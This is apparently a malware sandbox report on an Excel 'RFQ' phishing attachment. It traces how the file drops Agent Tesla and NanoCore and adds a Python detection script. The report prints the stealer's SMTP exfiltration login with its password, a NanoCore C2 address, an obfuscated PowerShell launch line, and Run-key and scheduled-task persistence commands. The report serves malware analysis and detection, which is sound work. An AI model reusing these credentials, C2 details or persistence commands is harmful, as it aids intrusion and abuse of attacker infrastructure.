Analysis

max time kernel: 152s
max time network: 155s
platform: windows7_x64
resource: win7v20210408
submitted: 26-09-2021 20:11

Static task: static1
Behavioral task: behavioral1
  Sample: RFQ#903_260921_new_request_10012_products.xls
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: RFQ#903_260921_new_request_10012_products.xls
  Resource: win10-en-20210920

General

Target: RFQ#903_260921_new_request_10012_products.xls
Size: 38KB
MD5: 03cf64f6dff8c1467a756d8c2e2fac16
SHA1: c124554906286cdaa48240a394777b1ef6c853fe
SHA256: 17b7d30b0960240b297dc208673fd4d8e9bfe52fc68a24785b83dc4b6702dba5
SHA512: 4d47bc2367459ad55f2c5a91733d729c045035f0d8ad3fefa7f1ba015d68da957efbafd3dbb25a3033fcb4ac539480cc1c5d8d6e4d8baefe61f68caeca25bbb9
Malware Config

Extracted: agenttesla
  Protocol: smtp
  Host: smtp.privateemail.com
  Port: 587
  Username: [email protected]
  Password: office12#
  Note: these are the operator's exfiltration mailbox credentials (Agent Tesla delivers stolen data over SMTP). Treat the host, port and account as indicators of the exfiltration channel, not as a compromised victim credential.

Extracted: nanocore 1.2.2.0
  C2: 185.140.53.52:4488
  Mutex / client ID: 4457cc23-84d1-4515-bdf3-bc83fe8472db
  activate_away_mode: true
  backup_connection_host: (empty)
  backup_dns_server: 8.8.4.4
  buffer_size: 65535
  build_time: 2021-07-08T12:51:02.136438436Z
  bypass_user_account_control: false
  bypass_user_account_control_data: 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
  clear_access_control: true
  clear_zone_identifier: false
  connect_delay: 4000
  connection_port: 4488
  default_group: EXPO
  enable_debug_mode: true
  gc_threshold: 1.048576e+07 (10485760)
  keep_alive_timeout: 30000
  keyboard_logging: false
  lan_timeout: 2500
  max_packet_size: 1.048576e+07 (10485760)
  mutex: 4457cc23-84d1-4515-bdf3-bc83fe8472db
  mutex_timeout: 5000
  prevent_system_sleep: false
  primary_connection_host: 185.140.53.52
  primary_dns_server: 8.8.8.8
  request_elevation: true
  restart_delay: 5000
  run_delay: 0
  run_on_startup: false
  set_critical_process: true
  timeout_interval: 5000
  use_custom_dns_server: false
  version: 1.2.2.0
  wan_timeout: 8000
  Notes: the default_group value EXPO matches the dropper name expo.exe seen in the process tree. request_elevation is true while bypass_user_account_control is false, so the implant asks for elevation (UAC prompt) rather than attempting a bypass, which is consistent with the EnableLUA query under Signatures. set_critical_process is true: the implant marks its own process as critical, so terminating it outright can crash the host; suspend the process or remove it from a clean boot instead.
Signatures

AgentTesla
  Agent Tesla is a .NET-based remote access tool (RAT) and information stealer; this build exfiltrates over SMTP (see Malware Config).

Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE (PID 1684) is not expected to spawn this process: cmd.exe (PID 1832)

Suricata alerts (2)
  ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile (two hits)
  Note: this rule fires on HTTP requests for executables with short alphanumeric names, consistent with the PowerShell stage retrieving the file run as ei.exe.
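The "unexpected child process" signature above, and the "Adds Run key" and "Creates scheduled task(s)" signatures further down, describe behaviours that are easy to re-detect from endpoint telemetry. The Python below is an added illustration, not code from the sandbox or the sample: it replays the report's process tree and registry writes as constructed Sysmon-style records (the field names type, pid, ppid, image, parent_image, cmdline, key and value are an assumed, simplified schema) together with three invented benign controls, and scores them with three rules. Two details matter in practice and are built in: powershell.exe is flagged even though its direct parent is cmd.exe, by walking up to the Office ancestor; and the HKLM Run value for "DPI Service" is flagged although its target is under Program Files, because the process writing it runs from %TEMP%.

```python
"""Detection replay for the report's process tree and registry activity.
Added example, not code from the sandbox or the sample. Events are
constructed Sysmon-style records in an assumed schema; PIDs and paths are
copied from the report, the last three records are invented benign controls."""
import ntpath
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
          "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
USER_WRITABLE = re.compile(r"\\AppData\\|\\ProgramData\\|\\Temp\\|\\Users\\Public\\", re.I)
SCHTASKS_XML = re.compile(r'/create\b.*?/xml\s+"?([^"]+)', re.I)

TEMP = r"C:\Users\Admin\AppData\Local\Temp"
EXCEL = r"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"
SYS = r"C:\Windows\SysWOW64"
HKCU = r"\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000"

EVENTS = [
    {"type": "process", "pid": 1684, "ppid": None, "image": EXCEL, "parent_image": None,
     "cmdline": f'"{EXCEL}" /dde {TEMP}\\RFQ#903_260921_new_request_10012_products.xls'},
    {"type": "process", "pid": 1832, "ppid": 1684, "image": SYS + r"\cmd.exe",
     "parent_image": EXCEL, "cmdline": "cmd.exe /c Po^W^ERS^he^LL -E <base64>"},
    {"type": "process", "pid": 2008, "ppid": 1832,
     "image": SYS + r"\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": SYS + r"\cmd.exe", "cmdline": "PoWERSheLL -E <base64>"},
    {"type": "registry", "pid": 1976, "image": SYS + r"\reg.exe",
     "key": HKCU + r"\Software\Microsoft\Windows\CurrentVersion\Run\expo",
     "value": r"C:\Users\Admin\AppData\Roaming\expo.exe"},
    {"type": "registry", "pid": 1844, "image": TEMP + r"\InstallUtil.exe",
     "key": r"\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DPI Service",
     "value": r"C:\Program Files (x86)\DPI Service\dpisv.exe"},
    {"type": "process", "pid": 432, "ppid": 1844, "image": SYS + r"\schtasks.exe",
     "parent_image": TEMP + r"\InstallUtil.exe",
     "cmdline": f'schtasks.exe /create /f /tn "DPI Service" /xml "{TEMP}\\tmpAEB5.tmp"'},
    # Benign controls (invented): explorer launching cmd, an installer writing
    # a Run value into Program Files, and a plain schtasks query.
    {"type": "process", "pid": 3000, "ppid": 3003, "image": SYS + r"\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe"},
    {"type": "registry", "pid": 3001, "image": r"C:\Windows\System32\msiexec.exe",
     "key": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vendor",
     "value": r"C:\Program Files\Vendor\app.exe"},
    {"type": "process", "pid": 3002, "ppid": 3004, "image": SYS + r"\schtasks.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe", "cmdline": "schtasks.exe /query"},
]


def base(image):
    return ntpath.basename(image or "").lower()


def user_writable(path):
    return bool(USER_WRITABLE.search(path or ""))


def office_ancestor(pid, procs, max_hops=4):
    """Walk ppid links and return the nearest Office ancestor record, if any."""
    cur = procs.get(pid)
    for _ in range(max_hops):
        if cur is None or cur["ppid"] not in procs:
            return None
        cur = procs[cur["ppid"]]
        if base(cur["image"]) in OFFICE_APPS:
            return cur
    return None


def run_rules(events):
    """Return sorted (rule, pid) findings for an event stream."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    findings = set()
    for e in events:
        if e["type"] == "process":
            # Rule 1: shell/LOLBin with an Office process anywhere up the chain.
            if base(e["image"]) in SHELLS and office_ancestor(e["pid"], procs):
                findings.add(("office_descended_shell", e["pid"]))
            # Rule 3: task imported from XML in a user-writable directory, or
            # schtasks launched by a binary that runs from one.
            if base(e["image"]) == "schtasks.exe":
                m = SCHTASKS_XML.search(e["cmdline"])
                if (m and user_writable(m.group(1))) or user_writable(e["parent_image"]):
                    findings.add(("schtasks_xml_from_temp", e["pid"]))
        elif e["type"] == "registry" and RUN_KEY.search(e["key"]):
            # Rule 2: Run value pointing into a user-writable path, or written
            # by a process that itself runs from one (the DPI Service case).
            if user_writable(e["value"]) or user_writable(e["image"]):
                findings.add(("run_key_persistence", e["pid"]))
    return sorted(findings)


FINDINGS = run_rules(EVENTS)

if __name__ == "__main__":
    for rule, pid in FINDINGS:
        print(f"{rule:24s} pid={pid}")
```

Running the file prints five findings: cmd.exe 1832 and powershell.exe 2008 under Excel, the two Run values (PIDs 1976 and 1844) and the schtasks import (PID 432); the three controls produce nothing.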
AgentTesla Payload (3 IoCs)
  YARA rule family_agenttesla matched C:\Users\Admin\AppData\Roaming\ammero.exe (three hits across the path variants of the same dropped file). ammero.exe (PID 1660) is therefore the Agent Tesla stage. The report does not tie the NanoCore config to a specific process; the other branch of the tree, expo.exe injecting into InstallUtil.exe and installing the "DPI Service" persistence, is the part not covered by the Agent Tesla hits.

Downloads MZ/PE file

Executes dropped EXE (3 IoCs)
  expo.exe (PID 628), ammero.exe (PID 1660), InstallUtil.exe (PID 1844)
  Note: InstallUtil.exe here is a copy dropped to %TEMP% (hashed under Downloads), not the .NET Framework utility under C:\Windows\Microsoft.NET; it is used as the host for the injected payload.

Loads dropped DLL (3 IoCs)
  ei.exe (PID 1108), expo.exe (PID 628, two loads)

Obfuscated with Agile.Net obfuscator (1 IoC)
  Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
  YARA rule agile_net matched behavioral1/memory/1108-96-0x0000000000740000-0x0000000000761000-memory.dmp (ei.exe, PID 1108)

Adds Run key to start application (2 TTPs, 3 IoCs)
  reg.exe: Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run
  reg.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\expo = "C:\Users\Admin\AppData\Roaming\expo.exe"
  InstallUtil.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DPI Service = "C:\Program Files (x86)\DPI Service\dpisv.exe"
  Note: two independent persistence entries: a per-user Run value for the dropper expo.exe, and a machine-wide (HKLM, WOW6432Node) Run value for the "DPI Service" copy. Writing under HKLM\...\Run needs administrative rights, which fits the EnableLUA check below and the request_elevation setting in the NanoCore config.

Checks whether UAC is enabled
  InstallUtil.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA

Suspicious use of SetThreadContext (1 IoC)
  expo.exe (PID 628) set thread context of InstallUtil.exe (PID 1844)
  Note: combined with the 12 WriteProcessMemory calls from PID 628 into PID 1844 (below) and the "mapping" dump for PID 1844 at 0x000000000041E792, inside the 224KB region at 0x0000000000400000, this is process hollowing: expo.exe starts the dropped InstallUtil.exe, overwrites its image with the payload and points the main thread at the new entry point.

Drops file in Program Files directory (2 IoCs)
  InstallUtil.exe: File created C:\Program Files (x86)\DPI Service\dpisv.exe
  InstallUtil.exe: File opened for modification C:\Program Files (x86)\DPI Service\dpisv.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox labels this as likely ransomware behaviour; it is a generic heuristic and, with only Agent Tesla and NanoCore identified in this run, is not evidence of ransomware on its own.

Office loads VBA resources, possible macro or embedded object present

Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  InstallUtil.exe (PID 1844) ran schtasks.exe twice (PIDs 432 and 1788), importing the task definitions "DPI Service" and "DPI Service Task" from XML files in %TEMP% (see Processes; the XML files are hashed under Downloads).

Enumerates system info in registry (2 TTPs, 1 IoC)
  EXCEL.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor

Modifies Internet Explorer settings
  (<SID> below stands for S-1-5-21-2455352368-1077083310-2879168483-1000; all entries are by EXCEL.EXE)
  Key created \REGISTRY\USER\<SID>\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel
  Set value (str) \REGISTRY\USER\<SID>\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE/3000"
  Set value (int) \REGISTRY\USER\<SID>\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"
  Key created \REGISTRY\USER\<SID>\Software\Microsoft\Internet Explorer\Toolbar
  Key created \REGISTRY\USER\<SID>\Software\Microsoft\Internet Explorer\MenuExt
  Key created \REGISTRY\USER\<SID>\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote
  Set value (int) \REGISTRY\USER\<SID>\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"
  Set value (str) \REGISTRY\USER\<SID>\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"
  Set value (str) \REGISTRY\USER\<SID>\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\PROGRA~2\MICROS~1\Office14\ONBttnIE.dll/105"
  Note: these are Excel's own first-run Internet Explorer integration keys (Export to Excel, Send to OneNote, discussion toolbar), not attacker activity.

Modifies system certificate store
  expo.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C
  expo.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 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
  Note: a new entry under AuthRoot\Certificates is what Windows' automatic root update produces when a process first validates a TLS chain, so this is a weak signal by itself; it does show that expo.exe built a TLS connection, consistent with it fetching its next stages.

Suspicious behavior: AddClipboardFormatListener (1 IoC)
  EXCEL.EXE (PID 1684)

Suspicious behavior: EnumeratesProcesses (17 IoCs)
  powershell.exe 2008 (2), ei.exe 1108 (5), expo.exe 628 (2), ammero.exe 1660 (2), InstallUtil.exe 1844 (6)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  InstallUtil.exe (PID 1844)

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Token: SeDebugPrivilege enabled by powershell.exe 2008, ei.exe 1108, expo.exe 628, ammero.exe 1660, InstallUtil.exe 1844

Suspicious use of FindShellTrayWindow (2 IoCs)
  EXCEL.EXE (PID 1684, two hits)

Suspicious use of SetWindowsHookEx (3 IoCs)
  EXCEL.EXE (PID 1684, three hits)

Suspicious use of WriteProcessMemory (48 IoCs)
  Parent -> child (number of writes):
    EXCEL.EXE 1684 -> cmd.exe 1832 (4)
    cmd.exe 1832 -> powershell.exe 2008 (4)
    powershell.exe 2008 -> ei.exe 1108 (4)
    ei.exe 1108 -> cmd.exe 1612 (4)
    cmd.exe 1612 -> reg.exe 1976 (4)
    ei.exe 1108 -> expo.exe 628 (4)
    expo.exe 628 -> ammero.exe 1660 (4)
    expo.exe 628 -> InstallUtil.exe 1844 (12)
    InstallUtil.exe 1844 -> schtasks.exe 432 (4)
    InstallUtil.exe 1844 -> schtasks.exe 1788 (4)
  Note: the same four-write pattern appears on every ordinary parent/child link in this tree, including the reg.exe and schtasks.exe launches, so four writes is the process-creation baseline here. Only the 12 writes into InstallUtil.exe exceed it, matching the SetThreadContext injection above.
Processes (indentation shows parent/child depth; PIDs taken from the signature tables)

[1] C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE (PID 1684)
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\RFQ#903_260921_new_request_10012_products.xls
    (the /dde switch is how the sandbox launched the document, not part of the sample's behaviour)
    - Enumerates system info in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\SysWOW64\cmd.exe (PID 1832)
      "C:\Windows\System32\cmd.exe" /c Po^W^ERS^he^LL -E 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
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2008)
        PoWERSheLL -E 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
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      [4] C:\Users\Admin\AppData\Local\Temp\ei.exe (PID 1108)
          "C:\Users\Admin\AppData\Local\Temp\ei.exe"
          - Loads dropped DLL
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\SysWOW64\cmd.exe (PID 1612)
            "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "expo" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\expo.exe"
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\SysWOW64\reg.exe (PID 1976)
              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "expo" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\expo.exe"
              - Adds Run key to start application

        [5] C:\Users\Admin\AppData\Roaming\expo.exe (PID 628)
            "C:\Users\Admin\AppData\Roaming\expo.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of SetThreadContext
            - Modifies system certificate store
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

          [6] C:\Users\Admin\AppData\Roaming\ammero.exe (PID 1660)
              "C:\Users\Admin\AppData\Roaming\ammero.exe"
              - Executes dropped EXE
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

          [6] C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe (PID 1844)
              "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
              - Executes dropped EXE
              - Adds Run key to start application
              - Checks whether UAC is enabled
              - Drops file in Program Files directory
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious behavior: GetForegroundWindowSpam
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory

            [7] C:\Windows\SysWOW64\schtasks.exe
                "schtasks.exe" /create /f /tn "DPI Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmpAEB5.tmp"
                - Creates scheduled task(s)

            [7] C:\Windows\SysWOW64\schtasks.exe
                "schtasks.exe" /create /f /tn "DPI Service Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpB09A.tmp"
                - Creates scheduled task(s)
                (the two schtasks.exe instances are PIDs 432 and 1788; the report does not state which PID created which task)
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe (listed three times in the report; one file)
  MD5: 91c9ae9c9a17a9db5e08b120e668c74c
  SHA1: 50770954c1ceb0bb6f1d5d3f2de2a0a065773723
  SHA256: e56a7e5d3ab9675555e2897fc3faa2dd9265008a4967a7d54030ab8184d2d38f
  SHA512: ca504af192e3318359d4742a2ef26ae1b5d040a4f9942782e02549a310158d5d5dbf919b4c748c31ee609d2046bd23ee0c22712891c86ae4a1e3a58c6e67647e

C:\Users\Admin\AppData\Local\Temp\tmpAEB5.tmp (scheduled task XML for "DPI Service")
  MD5: f7eb19c49b51cdff67a25c6876a78241
  SHA1: 6d86be501c2fb57b50292a55d3983b7eee8a688d
  SHA256: c9dab73a0044021d2acbc3952b19dea98cdfd838afc633197bd1bd12d2562fba
  SHA512: 1e94e363f9d4d0dcdfe0a8457642fcfe4f81dff0b39f1d1f00deab9291e133cd40b48c097dfe52c356d4a15c383e0aa08fae28b136937bcc57d5e01861716740

C:\Users\Admin\AppData\Local\Temp\tmpB09A.tmp (scheduled task XML for "DPI Service Task")
  MD5: a9af285136db016a568e4a53208f21d0
  SHA1: e1afef2b7ee8ae945353315daa19a15574b435b7
  SHA256: 7dce876e35550f4a5b8ce8a8bbab3b0ccd7c5b8660f9db4b832466b77e3a8b7c
  SHA512: 80a1f5e463a87cddc0f66336e2dc4262daf98984c6f6c662c3615d615ebe7c58677c3d694edb3bd7816ccee969aae967c7efe8526ba423f274ac1210c0c8bd6e

C:\Users\Admin\AppData\Roaming\ammero.exe (Agent Tesla payload; listed three times, one file)
  MD5: 605e939e44cd9b02c55ce0a09019ad47
  SHA1: 9ac8ff474631ed0c3d27a7290979b4880b9784f6
  SHA256: 5ab99263d0101e00809c2fe1f068bbcb601208c3fb0efd753b36169a3a69c589
  SHA512: 5196b9b698a71dc4510a57acabaee22ec2cd3f35c7c82c0ccbc00673ee97b471019a79e4cdb1ec6b5765ef70f1b5aebc19f56b0fa6a9932844c8ae07ba8b2b9d

C:\Users\Admin\AppData\Roaming\expo.exe (listed three times, one file)
  MD5: 419179d921ed1c875e2c690ee521d516
  SHA1: 12750f63f89e8086d59948ebe3664473364f72dc
  SHA256: 99b390b6b37a14d651e2bfc9d4588385c13ab7a367129a9e753f6650f6867d54
  SHA512: 823bfb71c82aedef4449cd1a584a0810b050139368ce0bb801ae0be629fdecac98733e48f6978e1d08020031f9ace52d050123baf035cf1bb87bd4b15e2c9702
Memory dumps (grouped by PID; "mapping.dmp" entries are the sandbox's process-creation snapshots)

PID 432 (schtasks.exe)
  memory/432-125-0x0000000000000000-mapping.dmp

PID 628 (expo.exe)
  memory/628-101-0x0000000000000000-mapping.dmp
  memory/628-104-0x0000000000CE0000-0x0000000000CE1000-memory.dmp (4KB)
  memory/628-106-0x0000000000B00000-0x0000000000B01000-memory.dmp (4KB)
  memory/628-108-0x0000000000B01000-0x0000000000B02000-memory.dmp (4KB)
  memory/628-111-0x0000000004B60000-0x0000000004B6B000-memory.dmp (44KB)
  memory/628-116-0x0000000004CB0000-0x0000000004CB1000-memory.dmp (4KB)

PID 1108 (ei.exe)
  memory/1108-92-0x0000000000000000-mapping.dmp
  memory/1108-93-0x0000000000E30000-0x0000000000E31000-memory.dmp (4KB)
  memory/1108-95-0x00000000005C0000-0x00000000005C1000-memory.dmp (4KB)
  memory/1108-96-0x0000000000740000-0x0000000000761000-memory.dmp (132KB; agile_net YARA hit)
  memory/1108-97-0x00000000005C1000-0x00000000005C2000-memory.dmp (4KB)

PID 1612 (cmd.exe)
  memory/1612-98-0x0000000000000000-mapping.dmp

PID 1660 (ammero.exe)
  memory/1660-110-0x0000000000000000-mapping.dmp
  memory/1660-114-0x0000000000140000-0x0000000000141000-memory.dmp (4KB)
  memory/1660-119-0x00000000048C0000-0x00000000048C1000-memory.dmp (4KB)

PID 1684 (EXCEL.EXE)
  memory/1684-60-0x000000002F491000-0x000000002F494000-memory.dmp (12KB)
  memory/1684-61-0x0000000071AE1000-0x0000000071AE3000-memory.dmp (8KB)
  memory/1684-62-0x000000005FFF0000-0x0000000060000000-memory.dmp (64KB)
  memory/1684-133-0x000000005FFF0000-0x0000000060000000-memory.dmp (64KB)

PID 1788 (schtasks.exe)
  memory/1788-128-0x0000000000000000-mapping.dmp

PID 1832 (cmd.exe)
  memory/1832-63-0x0000000000000000-mapping.dmp

PID 1844 (InstallUtil.exe)
  memory/1844-120-0x0000000000400000-0x0000000000438000-memory.dmp (224KB)
  memory/1844-121-0x000000000041E792-mapping.dmp (thread start address set by expo.exe via SetThreadContext, inside the 0x00400000 image)
  memory/1844-123-0x0000000000400000-0x0000000000438000-memory.dmp (224KB)
  memory/1844-126-0x0000000000470000-0x0000000000471000-memory.dmp (4KB)
  memory/1844-130-0x0000000000450000-0x0000000000455000-memory.dmp (20KB)
  memory/1844-131-0x00000000004F0000-0x0000000000509000-memory.dmp (100KB)
  memory/1844-132-0x0000000000460000-0x0000000000463000-memory.dmp (12KB)

PID 1976 (reg.exe)
  memory/1976-99-0x0000000000000000-mapping.dmp

PID 2008 (powershell.exe)
  memory/2008-64-0x0000000000000000-mapping.dmp
  memory/2008-65-0x0000000075B31000-0x0000000075B33000-memory.dmp (8KB)
  memory/2008-66-0x00000000022A0000-0x00000000022A1000-memory.dmp (4KB)
  memory/2008-67-0x0000000004850000-0x0000000004851000-memory.dmp (4KB)
  memory/2008-68-0x0000000004810000-0x0000000004811000-memory.dmp (4KB)
  memory/2008-69-0x0000000004812000-0x0000000004813000-memory.dmp (4KB)
  memory/2008-70-0x0000000004750000-0x0000000004751000-memory.dmp (4KB)
  memory/2008-71-0x0000000005240000-0x0000000005241000-memory.dmp (4KB)
  memory/2008-74-0x0000000005640000-0x0000000005641000-memory.dmp (4KB)
  memory/2008-79-0x0000000006050000-0x0000000006051000-memory.dmp (4KB)
  memory/2008-80-0x000000007EF30000-0x000000007EF31000-memory.dmp (4KB)
  memory/2008-81-0x00000000062F0000-0x00000000062F1000-memory.dmp (4KB)
  memory/2008-88-0x0000000006170000-0x0000000006171000-memory.dmp (4KB)
  memory/2008-89-0x0000000006380000-0x0000000006381000-memory.dmp (4KB)
  memory/2008-90-0x00000000003C0000-0x00000000003C1000-memory.dmp (4KB)